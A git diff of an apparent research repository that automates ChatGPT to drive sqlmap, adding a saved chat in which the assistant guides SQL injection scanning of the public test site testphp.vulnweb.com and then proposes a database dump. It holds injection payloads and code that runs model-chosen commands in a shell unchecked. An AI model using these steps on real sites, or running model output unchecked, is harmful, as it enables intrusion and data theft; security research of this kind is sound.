diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..50fadda Binary files /dev/null and b/.DS_Store differ diff --git a/README.md b/README.md index 21841cd..b6775d9 100644 --- a/README.md +++ b/README.md @@ -10,4 +10,4 @@ The goal is to build a user-friendly bridge to automate ChatGPT and other GPT mo ## Examples 1. **Get username on local PC**: `python3 example_chatgpt_api.py` -2. **Use SQLMap**: `python3 example_sqlmap.py` \ No newline at end of file +2. **Use SQLMap**: `python3 example_sqlmap.py` diff --git a/example_chat_history/SQL Vulnerability Detection Tutorial (12_03_2023 10_42_27).html b/example_chat_history/SQL Vulnerability Detection Tutorial (12_03_2023 10_42_27).html new file mode 100644 index 0000000..4b0cea4 --- /dev/null +++ b/example_chat_history/SQL Vulnerability Detection Tutorial (12_03_2023 10_42_27).html @@ -0,0 +1,59 @@ + SQL Vulnerability Detection Tutorial
Gelei Deng
I want you to act as a penetration tester and perform a tutorial session for students. You can use sqlmap as the tool to detect vulnerabilities on a mock website. You should react based on the terminal outputs I give you, and always return me the commands to operate next. You should repeat until a sql vulnerability is identified. Then you should tell the students "vulnerability identified!!!". Do you understand?

Yes, I understand your request. As a language model, I don't have direct access to a terminal, but I can guide you through the steps of using sqlmap to detect SQL vulnerabilities on a mock website. I will provide you with commands to run in the terminal and instructions on how to react to the output. Please let me know if you're ready to begin.

Gelei Deng
Okay good. The url is http://testphp.vulnweb.com. Let's start

Great! Let's begin the tutorial.

First, let's check if the website is vulnerable to SQL injection using sqlmap. Please run the following command in your terminal:

javascript
sqlmap -u http://testphp.vulnweb.com
+

This command tells sqlmap to scan the URL "http://testphp.vulnweb.com" for any SQL injection vulnerabilities.

Once you run the command, sqlmap will start scanning the website and provide you with output on the terminal. Please follow the instructions on the terminal and input any required information.

If sqlmap detects any SQL injection vulnerabilities, it will print a message saying "vulnerability identified!!!". If not, we will continue to the next step.

Please let me know what the terminal output is after running the command.

Gelei Deng
+[09:30:07] [INFO] testing connection to the target URL +[09:30:08] [INFO] testing if the target URL content is stable +[09:30:09] [INFO] target URL content is stable +[09:30:09] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--forms --crawl=2'

Based on the output you provided, sqlmap was not able to detect any GET parameters in the URL "http://testphp.vulnweb.com". A GET parameter is the part of the URL that follows a "?" and specifies values that are sent to the server. In order to test for SQL injection vulnerabilities, sqlmap needs to identify a GET parameter that it can inject with malicious code.

As the output suggests, let's try running sqlmap with the "--forms" and "--crawl=2" options to see if it can identify any GET parameters. Please run the following command:

javascript
sqlmap -u http://testphp.vulnweb.com --forms --crawl=2
+

This command tells sqlmap to crawl the website up to two levels deep and search for forms that contain GET parameters.

Once you run the command, sqlmap will start scanning the website and provide you with output on the terminal. Please follow the instructions on the terminal and input any required information.

If sqlmap detects any SQL injection vulnerabilities, it will print a message saying "vulnerability identified!!!". If not, please let me know what the output is.

Gelei Deng
The output is below. What should I do next? + +[1/6] Form: +POST http://testphp.vulnweb.com/search.php?test=query +POST data: searchFor=&goButton=go +do you want to test this form? [Y/n/q] +> Y +Edit POST data [default: searchFor=&goButton=go] (Warning: blank fields detected): searchFor=&goButton=go +do you want to fill blank fields with random values? [Y/n] Y +it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y +injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y +[2/6] Form: +POST http://testphp.vulnweb.com/AJAX/showxml.php +POST data: <xml><node name="nodename1">nodetext1</node><node name="nodename2">nodetext2</node></xml> +do you want to test this form? [Y/n/q] +> Y +Edit POST data [default: <xml><node name="nodename1">nodetext1</node><node name="nodename2">nodetext2</node></xml>]: <xml><node name="nodename1">nodetext1</node><node name="nodename2">nodetext2</node></xml> +SOAP/XML data found in POST body. Do you want to process it? [Y/n/q] Y +[3/6] Form: +POST http://testphp.vulnweb.com/userinfo.php +POST data: uname=&pass= +do you want to test this form? [Y/n/q] +> Y +Edit POST data [default: uname=&pass=] (Warning: blank fields detected): uname=&pass= +do you want to fill blank fields with random values? [Y/n] Y +got a 302 redirect to 'http://testphp.vulnweb.com:80/login.php'. Do you want to follow? [Y/n] Y +redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y +it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y +for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y +POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N +sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests: +--- +Parameter: uname (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + Payload: uname=-4626%' OR 4235=4235#&pass= + + Type: UNION query + Title: MySQL UNION query (NULL) - 8 columns + Payload: uname=lhpY%' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766a71,0x766575527352534f48484a4b624475514a72455a444455566d546c414474424e4b7767676845656a,0x717a6b7171),NULL,NULL,NULL,NULL#&pass= +--- +do you want to exploit this SQL injection? [Y/n] Y +web server operating system: Linux Ubuntu +web application technology: Nginx 1.19.0, PHP 5.6.40 +back-end DBMS: MySQL Unknown +SQL injection vulnerability has already been detected against 'testphp.vulnweb.com'. Do you want to skip further tests involving it? [Y/n] Y + +[*] ending @ 10:05:28 /2023-03-12/

Great! The output shows that a SQL injection vulnerability was identified on the website. Let's exploit it.

You can use the following command to dump the database:

kotlin
sqlmap -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=-4626%' OR 4235=4235#&pass=" --dump
+

This will dump the database and display all the data stored on the website.

Let me know if you need any further assistance.

ChatGPT Feb 13 Version. Free Research Preview. Our goal is to make AI systems more natural and safe to interact with. Your feedback will help us improve.
Chat History
\ No newline at end of file diff --git a/example_chatgpt_api.py b/example_chatgpt_api.py index 6cb82a0..dd4e64a 100644 --- a/example_chatgpt_api.py +++ b/example_chatgpt_api.py @@ -3,9 +3,12 @@ from llm_handle.parser import extract_cmd from task_handle.cmd_execution import execute_cmd import os + def __main__(): bot = ChatGPT() - response = bot.ask("Can you give me a sample command in Mac terminal for checking the user names? Please give me the code directly.") + response = bot.ask( + "Can you give me a sample command in Mac terminal for checking the user names? Please give me the code directly." + ) sample_response = """ Certainly! To list all user names on a Mac using the terminal, you can use the `dscl` command with the `list` option for the `/Users` node. Here's the command: ``` @@ -30,6 +33,3 @@ def __main__(): # delete the session in the end bot.delete_conversation() - - - diff --git a/example_sqlmap.py b/example_sqlmap.py index 67d3296..5569040 100644 --- a/example_sqlmap.py +++ b/example_sqlmap.py @@ -21,11 +21,14 @@ Are you clear about it? keyword = "vulnerability detected!!!" prefix = "The output from terminal is :\n" + class sqlmapHandler(chatGPTTemplate): # should override the run function def run(self): self.initialize() - response = self.ask("Now please start, the website is: http://testphp.vulnweb.com/listproducts.php?cat=1") + response = self.ask( + "Now please start, the website is: http://testphp.vulnweb.com/listproducts.php?cat=1" + ) while True: # get the response from the bot # if the keyword is detected, break the loop @@ -47,11 +50,12 @@ class sqlmapHandler(chatGPTTemplate): # feed the output to the bot response = self.ask(output, need_prefix=True) + if __name__ == "__main__": - #1. init the bot session + # 1. init the bot session bot = ChatGPT() chat_handler = sqlmapHandler(bot, init_script=init_script) chat_handler._update_prefix(prefix) - #2. run the chat + # 2. run the chat chat_handler.run() diff --git a/llm_handle/parser.py b/llm_handle/parser.py index 4e17844..cfae3a9 100644 --- a/llm_handle/parser.py +++ b/llm_handle/parser.py @@ -1,8 +1,10 @@ import re -def extract_cmd(response:str) -> str: + + +def extract_cmd(response: str) -> str: """ Process the response from chatgpt_wrapper, and extract the command for the bot. - + Parameters ---------- response: str @@ -27,11 +29,9 @@ def extract_cmd(response:str) -> str: raise ValueError("More than one command is found.") except AttributeError: # Nonetype, nothing found return False - + result = result_list[0] - if result[0] == "\n": # If the command starts with a newline, remove it. + if result[0] == "\n": # If the command starts with a newline, remove it. result = result[1:] - + return result - - diff --git a/requirements.txt b/requirements.txt index ae93c5f..e6eb24d 100644 --- a/requirements.txt +++ b/requirements.txt @@ -2,3 +2,4 @@ requests pyyaml playwright==1.28.0 sqlmap +black \ No newline at end of file diff --git a/task_handle/cmd_execution.py b/task_handle/cmd_execution.py index ee0eb2c..d9d809a 100644 --- a/task_handle/cmd_execution.py +++ b/task_handle/cmd_execution.py @@ -1,15 +1,15 @@ - import os, subprocess -def execute_cmd(cmd:str) -> str: + +def execute_cmd(cmd: str) -> str: """ Execute the command in the mac terminal. - + Parameters ---------- cmd: str The command to be executed. - + Returns ---------- output: str @@ -17,17 +17,17 @@ def execute_cmd(cmd:str) -> str: """ try: # execute the command in the system terminal - p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr = None, shell=True) + p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=None, shell=True) output = "" # some tools may take time to execute. Wait until the output is finished. while True: line_output = p.stdout.readline() if line_output: output += line_output.decode("utf-8") - if line_output == b'' and p.poll() is not None: + if line_output == b"" and p.poll() is not None: break return output except Exception as e: print("Error in executing the command:", e) - return None \ No newline at end of file + return None diff --git a/task_handle/custom_exceptions.py b/task_handle/custom_exceptions.py index 0da2799..e09caf8 100644 --- a/task_handle/custom_exceptions.py +++ b/task_handle/custom_exceptions.py @@ -1,4 +1,5 @@ # declare the custom types of exceptions + class NoCodeFromResponseException(Exception): - pass \ No newline at end of file + pass diff --git a/task_handle/template.py b/task_handle/template.py index 9077586..d3f3d26 100644 --- a/task_handle/template.py +++ b/task_handle/template.py @@ -4,7 +4,7 @@ import os, logging, re from .custom_exceptions import NoCodeFromResponseException -class chatGPTTemplate(): +class chatGPTTemplate: """ A template for the chatGPT task. It contains the basic functions that are required for the task. @@ -13,7 +13,7 @@ class chatGPTTemplate(): def __init__(self, bot_session, init_script=None): """ Initialize the by taking the session - The bot session is a standard chatgpt_wrapper bot session. + The bot session is a standard chatgpt_wrapper bot session. More details at https://github.com/mmabrouk/chatgpt-wrapper Parameters: @@ -34,7 +34,7 @@ class chatGPTTemplate(): self._init_script = init_script self._prefix = None self._exception_ask = {} - + def _extract_command(self, response: str) -> str: """ This function is used to extract the command from the response. @@ -55,11 +55,11 @@ class chatGPTTemplate(): raise ValueError("More than one command is found.") except Exception: # Nonetype, nothing found raise NoCodeFromResponseException("No code is found in the response.") - + result = result_list[0] - if result[0] == "\n": # If the command starts with a newline, remove it. + if result[0] == "\n": # If the command starts with a newline, remove it. result = result[1:] - + return result def _cmd_wrapper(self, cmd: str) -> str: @@ -73,8 +73,7 @@ class chatGPTTemplate(): # the possible types of exceptions output = execute_cmd(cmd) return output - - + def _update_init_script(self, init_script: str): """ This function is used to update the initialization script. @@ -101,7 +100,6 @@ class chatGPTTemplate(): Returns: """ return prefix + question - ########## Implementations ########## @@ -112,8 +110,8 @@ class chatGPTTemplate(): """ if self._init_script is not None: self._bot_session.ask(self._init_script) - - def ask(self, question: str, need_prefix = False) -> str: + + def ask(self, question: str, need_prefix=False) -> str: """ Wrap the default bot ask function. Parameters: @@ -133,7 +131,7 @@ class chatGPTTemplate(): except Exception as e: print("Error in asking the question:", e) return None - + def exception_ask(self, question: str) -> str: """ This function is used to ask the bot when an exception is raised. @@ -146,10 +144,10 @@ class chatGPTTemplate(): return self.ask(self._exception_ask) else: return None - + def run(self): """ The function with the main logic. This should be overwritten in the task execution. """ print("Please override the run function!") - pass \ No newline at end of file + pass diff --git a/tasks/NLP_RESTAPI_Repairment.py b/tasks/NLP_RESTAPI_Repairment.py index 6b81d9e..e7bb131 100644 --- a/tasks/NLP_RESTAPI_Repairment.py +++ b/tasks/NLP_RESTAPI_Repairment.py @@ -1,10 +1,5 @@ # This handle helps to translate RESTful API documentation in natural language to OpenAPI Specification 3.0 - ##### Functions ##### # Get the natural language description of the RESTful API. - - - - diff --git a/test_os_execution.py b/test_os_execution.py index 90b8256..fe38da5 100644 --- a/test_os_execution.py +++ b/test_os_execution.py @@ -6,16 +6,15 @@ import subprocess cmd = 'sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --batch --level=5 --risk=3' # execute the command -p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr = None, shell=True) +p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=None, shell=True) output_str = "" while True: output = p.stdout.readline() if output: print(output.decode("utf-8"), end="") output_str += output.decode("utf-8") - if output == b'' and p.poll() is not None: + if output == b"" and p.poll() is not None: print("------end of output------") break print(output_str) - \ No newline at end of file